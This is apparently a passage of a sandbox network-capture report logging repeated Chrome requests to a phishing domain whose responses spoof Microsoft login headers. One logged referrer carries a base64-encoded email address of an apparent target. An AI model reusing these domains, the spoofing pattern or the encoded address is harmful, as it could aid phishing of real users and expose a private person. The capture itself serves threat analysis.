                                                                                                                                                                                                51192.168.2.849932164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:25:49 UTC712OUTGET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1
                                                                                                                                                                                                Host: djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; brcap=0
                                                                                                                                                                                                Sec-WebSocket-Key: nB5nUKYjSWUUM2IeJszgvQ==
                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                2024-12-05 07:25:50 UTC740INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:25:50 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                cache-control: private
                                                                                                                                                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                x-ms-request-id: b9c06676-a621-4407-907a-3e014c9c4b00
                                                                                                                                                                                                x-ms-ests-server: 2.1.19492.3 - FRC ProdSlices
                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                x-ms-srs: 1.P
                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                access-control-allow-headers: *
                                                                                                                                                                                                2024-12-05 07:25:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                52192.168.2.849960164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:26:02 UTC712OUTGET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1
                                                                                                                                                                                                Host: djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; brcap=0
                                                                                                                                                                                                Sec-WebSocket-Key: BTiy7LKwCIUvNrGTG/iqew==
                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                2024-12-05 07:26:03 UTC740INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:26:02 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                cache-control: private
                                                                                                                                                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                x-ms-request-id: cf117a4c-e308-41ec-88ae-bf2977b59d01
                                                                                                                                                                                                x-ms-ests-server: 2.1.19492.3 - FRC ProdSlices
                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                x-ms-srs: 1.P
                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                access-control-allow-headers: *
                                                                                                                                                                                                2024-12-05 07:26:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                53192.168.2.850000164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:26:19 UTC712OUTGET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1
                                                                                                                                                                                                Host: djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; brcap=0
                                                                                                                                                                                                Sec-WebSocket-Key: /AqC7Lx6K6mLPC7QDIE/Zw==
                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                2024-12-05 07:26:20 UTC740INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:26:20 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                cache-control: private
                                                                                                                                                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                x-ms-request-id: d3e330e8-12d7-4743-8cb4-73dbd5dd7101
                                                                                                                                                                                                x-ms-ests-server: 2.1.19492.3 - SEC ProdSlices
                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                x-ms-srs: 1.P
                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                access-control-allow-headers: *
                                                                                                                                                                                                2024-12-05 07:26:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                54192.168.2.850046164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:26:40 UTC712OUTGET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1
                                                                                                                                                                                                Host: djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; brcap=0
                                                                                                                                                                                                Sec-WebSocket-Key: YJO9FgX9QSCi5rvDpIA1Hg==
                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                2024-12-05 07:26:41 UTC740INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:26:40 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                cache-control: private
                                                                                                                                                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                x-ms-request-id: 7d5f50b4-631d-4ba0-a1c4-cfb2c4428101
                                                                                                                                                                                                x-ms-ests-server: 2.1.19492.3 - SEC ProdSlices
                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                x-ms-srs: 1.P
                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                access-control-allow-headers: *
                                                                                                                                                                                                2024-12-05 07:26:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                55192.168.2.850057164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:26:44 UTC445OUTOPTIONS /api/report?catId=GW+estsfd+SEC HTTP/1.1
                                                                                                                                                                                                Host: 43042841-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Access-Control-Request-Method: POST
                                                                                                                                                                                                Access-Control-Request-Headers: content-type
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                2024-12-05 07:26:44 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:26:44 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                access-control-allow-headers: content-type
                                                                                                                                                                                                access-control-allow-credentials: false
                                                                                                                                                                                                access-control-allow-methods: *, GET, OPTIONS, POST
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                2024-12-05 07:26:44 UTC12INData Raw: 37 0d 0a 4f 50 54 49 4f 4e 53 0d 0a
                                                                                                                                                                                                Data Ascii: 7OPTIONS
                                                                                                                                                                                                2024-12-05 07:26:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                56192.168.2.850063164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:26:46 UTC370OUTPOST /api/report?catId=GW+estsfd+SEC HTTP/1.1
                                                                                                                                                                                                Host: 43042841-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                Content-Length: 591
                                                                                                                                                                                                Content-Type: application/reports+json
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                2024-12-05 07:26:46 UTC591OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 32 30 30 35 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 34 33 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 64 6a 64 6a 6b 64 6c 65 6c 6c 65 6b 6b 66 66 2e 67 68 61 72 65 6c 6f 6b 68 61 6e 61 2e 63 6f 6d 2f 3f 6b 6d 3d 61 32 78 68 64 58 4d 75 62 57 46 6b 5a 58 4a 41 63 32 4a 76 4c 6d 4e 76 4c 6d 46 30 25 43 33 25 38 33 25 43 32 25 41 33 25 43 33 25 41 32 25 43 32 25 38 32 25 43 32 25 41 43 25 43 33 25 41 32 25 43 32 25 38 30 25 43 32 25 39 41 24 24 24 25 43 33 25 38 33 25 43 32 25 41 33 25 43 33 25 41
                                                                                                                                                                                                Data Ascii: [{"age":120051,"body":{"elapsed_time":2433,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A
                                                                                                                                                                                                2024-12-05 07:26:47 UTC367INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:26:47 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                request-context: appId=cid-v1:c242839f-7b23-4fcd-8b70-f19e1d322576
                                                                                                                                                                                                access-control-allow-credentials: false
                                                                                                                                                                                                access-control-allow-methods: *, GET, OPTIONS, POST
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                2024-12-05 07:26:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                57192.168.2.850072164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:26:49 UTC712OUTGET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1
                                                                                                                                                                                                Host: djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; brcap=0
                                                                                                                                                                                                Sec-WebSocket-Key: 9GYZ6r0MH1FrVFFleA1O4w==
                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                2024-12-05 07:26:50 UTC740INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:26:50 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                cache-control: private
                                                                                                                                                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                x-ms-request-id: 79999ed5-e2ba-41de-95a6-cf6723bb9e01
                                                                                                                                                                                                x-ms-ests-server: 2.1.19492.3 - FRC ProdSlices
                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                x-ms-srs: 1.P
                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                access-control-allow-headers: *
                                                                                                                                                                                                2024-12-05 07:26:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                58192.168.2.850073164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:27:02 UTC712OUTGET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1
                                                                                                                                                                                                Host: djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; brcap=0
                                                                                                                                                                                                Sec-WebSocket-Key: x9Vt/SDt0JE+s/8hgaAZkw==
                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                2024-12-05 07:27:03 UTC740INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:27:03 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                cache-control: private
                                                                                                                                                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                x-ms-request-id: f66d5a13-7b57-49c0-8b00-f9467d6ea701
                                                                                                                                                                                                x-ms-ests-server: 2.1.19492.3 - FRC ProdSlices
                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                x-ms-srs: 1.P
                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                access-control-allow-headers: *
                                                                                                                                                                                                2024-12-05 07:27:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                59192.168.2.850074164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:27:19 UTC712OUTGET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1
                                                                                                                                                                                                Host: djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; brcap=0
                                                                                                                                                                                                Sec-WebSocket-Key: d9XFz1lKG4ywGolkYqwOYg==
                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                2024-12-05 07:27:20 UTC740INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:27:20 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                cache-control: private
                                                                                                                                                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                x-ms-request-id: 06fbc155-3601-4999-ba2c-47be24db5800
                                                                                                                                                                                                x-ms-ests-server: 2.1.19492.3 - SEC ProdSlices
                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                x-ms-srs: 1.P
                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                access-control-allow-headers: *
                                                                                                                                                                                                2024-12-05 07:27:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                60192.168.2.850075164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:27:28 UTC712OUTGET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1
                                                                                                                                                                                                Host: djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; brcap=0
                                                                                                                                                                                                Sec-WebSocket-Key: bGRlan2jHQSq7eQrtpFPcQ==
                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                2024-12-05 07:27:29 UTC740INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:27:28 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                cache-control: private
                                                                                                                                                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                x-ms-request-id: 6329a10d-3673-4587-8ed1-6c9c3cac6f01
                                                                                                                                                                                                x-ms-ests-server: 2.1.19492.3 - SEC ProdSlices
                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                x-ms-srs: 1.P
                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                access-control-allow-headers: *
                                                                                                                                                                                                2024-12-05 07:27:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                61192.168.2.850076164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:27:57 UTC712OUTGET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1
                                                                                                                                                                                                Host: djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; brcap=0
                                                                                                                                                                                                Sec-WebSocket-Key: uJe7cZLbEZ1ebTcDlTD8OA==
